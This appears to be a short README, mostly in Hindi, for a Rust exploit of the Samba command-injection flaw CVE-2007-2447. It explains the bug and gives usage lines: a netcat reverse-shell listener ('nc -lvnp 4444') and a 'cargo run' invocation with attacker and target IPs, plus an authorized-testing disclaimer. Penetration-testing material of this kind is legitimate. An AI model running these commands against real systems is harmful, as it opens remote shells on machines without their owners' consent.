
CVE-2007-2447 एक्सप्लॉइट का एक स्टैंडअलोन Rust कार्यान्वयन, जो Samba smbd 3.0.20-Debian को लक्षित करता है।
CVE-2007-2447 एक्सप्लॉइट का एक स्टैंडअलोन Rust कार्यान्वयन जो Samba smbd 3.0.20-Debian को लक्षित करता है।
CVE-2007-2447, Samba संस्करण 3.0.0 से 3.0.25rc3 में एक कमांड इंजेक्शन भेद्यता है। यह भेद्यता SamrChangePassword() फ़ंक्शन में मौजूद है, जो उपयोगकर्ता इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है, जिससे हमलावर SMB प्रमाणीकरण के दौरान उपयोगकर्ता नाम क्षेत्र में शेल मेटाकैरेक्टर के माध्यम से मनमाना कमांड निष्पादित कर सकते हैं।
netcat उपलब्ध हो (आमतौर पर डिफ़ॉल्ट रूप से स्थापित होता है)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# Set up a netcat listener
nc -lvnp 4444
# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost: आपकी हमला करने वाली मशीन का IP पता--lport: रिवर्स शेल कनेक्शन प्राप्त करने के लिए पोर्ट--target: लक्ष्य मशीन का IP पतायह उपकरण केवल शैक्षिक और अधिकृत पेनेट्रेशन टेस्टिंग उद्देश्यों के लिए है। जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टमों पर उपयोग करें जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट अनुमति है।